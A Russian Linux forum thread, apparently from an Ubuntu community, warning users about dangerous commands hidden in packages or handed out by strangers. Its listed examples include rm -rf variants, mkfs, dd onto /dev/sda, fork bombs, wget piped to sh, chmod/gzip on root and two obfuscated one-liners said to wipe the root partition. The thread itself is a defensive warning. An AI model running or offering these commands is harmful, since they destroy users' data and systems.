Будьте внимательны или опасные команды

Автор Ghostdmn, 27 мая 2011, 23:37:09

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Ghostdmn

Настоятельно рекомендуем Вам, во избежание неприятных последствий, проверять путем открытия в gedit бинарных файлов, содержащихся в deb, так и самостоятельных, на отсутствие команд, содержащих:

Удаление. Удаляет все файлы, текущую директорию и все видимые файлы в текущей директории. По моему, достаточно ясно, почему эти команды опасны для запуска.

рм -рф в любых вариациях
rm -r .[^.]*


К сожалению, примеры вновь стали проявлятся. 27.05.2011 на сайте gnome-look.org был обнаружен deb-файл, устанавливающий, якобы, тему для рабочего стола. В директории Debian, как оказалось, содержался скрипт с вышеуказанной командой. Контент, конечно, удален, но полностью избежать подобных эксцессов не удастся. Будьте бдительны.

Переформатирование: Данные на устройстве указанном после команды mkfs будут уничтожены и заменены на чистую файловую систему.

mkfs
mkfs.ext3
mkfs.anything


Манипуляции с блочным устройством: "Сырые" данные будут записаны на блочное устройство. В большинстве случаев, это приведёт к полному затиранию файловой системы и потере всей информации:

any_command > /dev/sda
dd if=something of=/dev/sda


Forkbomb: Запускает огромное количество процессов, до тех пор пока система не зависнет, принуждая вас сделать жёсткую перезагрузку, которая может привести к утрате, повреждению данных или другим ужасным последствиям. В Bourne-подобных оболочках, например такой как Bash: (Это выглядит действительно любопытно и провоцирующе)


:(){ :|:& };:
НаPerl:
fork while fork


Tar-бомбу: Кто-то просит вас распаковать tar архив в существующую директорию. Такой архив может содержать миллионы файлов или проникать в систему угадывая имена файлов. Вы должны взять за правило, распаковывать архивы только во вновь созданные директории.

Распаковывающуюся бомбу: Кто-то просит вас распаковать архив, который на первый взгляд выглядит легким для закачки. На самом деле это данные запакованные с высокой степенью сжатия и при распаковке они будут заполнять ваш жёсткий диск, раздуваясь на сотни гигабайт. Не берите данные с непроверенных источников

Скрипт командной оболочки: Кто-то даёт вам ссылку на скрипт командной оболочки для запуска. Он может содержать любые команды как неопасные, так и зловредные. Не запускайте код, полученный от людей, которым вы не доверяете.

wget http://какое-то_место/какой-то_файл
sh ./какой-то_файл

wget http://какое-то_место/какой-то_файл -O- | sh

Код компиляции: Кто-то даёт вам исходные коды и затем просит вам их откомпилировать. Очень просто спрятать вредоносный код где-нибудь внутри большого куска исходного кода и исходный код даёт атакующему гораздо больше возможностей для маскировки вредоносной информации. Не компилируйте и не запускайте откомпилированный код, если это не код хорошо известного приложения, полученный с доверенного сайта (например SourceForge или домашняя страница автора или сайт Debian.org)

Для начинающих пользователей это выглядит как "непонятный набор hex кодов", который так типичен для пробных версий. Как бы то ни было, на самом деле запускается команда рм -рф ~ / &, которая уничтожает вашу домашнюю директорию, если вы под обычным пользователем и все файлы, если вы под суперпользователем. Если вы можете различить команду в этом коде, значит вам не нужно читать эту тему. В противном случае, помните, что такие вещи могут встречаться в любых подобных кодах - будьте осторожны.

Ещё несколько опасных примеров.

Программа из одной строчки на Perl:

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'


Удаляет все каталоги в корневой директории!

Запускать под bash'ем из-под рута:

ISF=$(echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -');$ISF 2>/dev/null

Команда молча потрёт всю корневую партицию!


Лучшим решением будет установка из проверенных источников, так вы будете максимально обезопасены от неприятных последствий.

P.S. Убедительная просьба не испытывать команды "на прочность". Часть команд может и не работать, но все же...

И последнее. Помним, что применение подобных команд в отношении пользователей является, в соответствии в Уголовным Кодексом РФ, уголовно-наказуемым деянием (ст.ст.  273, 274 УК РФ), а на форуме карается полным лишением доступа
8Gb/GTX750Ti 2Gb/AMD FX(tm)-4300 Quad-Core Processor/HDD 1Tb Toshiba DT01ACA100

eof

Полезная тема.
Хочется добавить: если не знаете что делает та или иная команда, которую вам говорят выполнить, то постарайтесь узнать для чего она предназначена. Самое простое это обратиться к справочным страницам (man команда) по каждой из команд. Также может помочь запрос приведённой команды в поисковой системе.
Будьте бдительны. "Доверяй, но проверяй", пожалуй, лучшее что можно сказать по этому поводу.

saveriy

Ghostdmn, спасибо за столь внятную и очень полезную тему.

alsoijw

Вот ещё несколько:
sudo chmod / 777 -R
sudo gzip -rf /
chmod 0777 ~
А что, тут тоже r​m​ -r​f / запрещён, и показывается как рм -рф /? Зачем? Тут вроде не тупицы сидят.
Мало видеть нам начало - надо видеть и конец. Если видишь ты создание - значит где-то есть ТВОРЕЦ
Многие жалуются: геометрия в жизни не пригодилась. Ямб от хорея им приходится отличать ежедневно?

BULATUS

Цитата: alsoijw от 18 декабря 2014, 15:26:54Тут вроде не тупицы сидят.
Тупиц нет. Где они я не знаю... но подозреваю, что командой может воспользоваться не только здешний обитатель, но и любой другой человек, нашедший эти символы по поиску в гугле и т.п. В оригинале команда не запрещена, а превентивно заменена. Расценивайте это профилактикой.  :)

alsoijw

рм -рф ~/.config/chromium. Систему вроде не ломает(я так хромиум в убунте чинил) но заменяется.
BULATUS, у меня по этому поводу небольшое недопонимание на форуме убунты случилось... Могу в ЛС ответить, если интересно.
Мало видеть нам начало - надо видеть и конец. Если видишь ты создание - значит где-то есть ТВОРЕЦ
Многие жалуются: геометрия в жизни не пригодилась. Ямб от хорея им приходится отличать ежедневно?

alsoijw

Мало видеть нам начало - надо видеть и конец. Если видишь ты создание - значит где-то есть ТВОРЕЦ
Многие жалуются: геометрия в жизни не пригодилась. Ямб от хорея им приходится отличать ежедневно?

Leo

~ никому передавать не надо - тильда - домашний каталог пользователя  ;D

alsoijw

#8
Вот так
Цитироватьr​m -rf ~
Из под обычного юзера, но удалит файлы.

способов прострелить себе ногу много, не давайте невнимательным юзерам ещё один, ogost
Мало видеть нам начало - надо видеть и конец. Если видишь ты создание - значит где-то есть ТВОРЕЦ
Многие жалуются: геометрия в жизни не пригодилась. Ямб от хорея им приходится отличать ежедневно?

alsoijw

Мало видеть нам начало - надо видеть и конец. Если видишь ты создание - значит где-то есть ТВОРЕЦ
Многие жалуются: геометрия в жизни не пригодилась. Ямб от хорея им приходится отличать ежедневно?

dsdsda

systemctl set-default runlevel
Обычно, ради шутки изменяют runlevel на шестой или нулевой.
Debian GNU/Linux (stable/testing/unstable)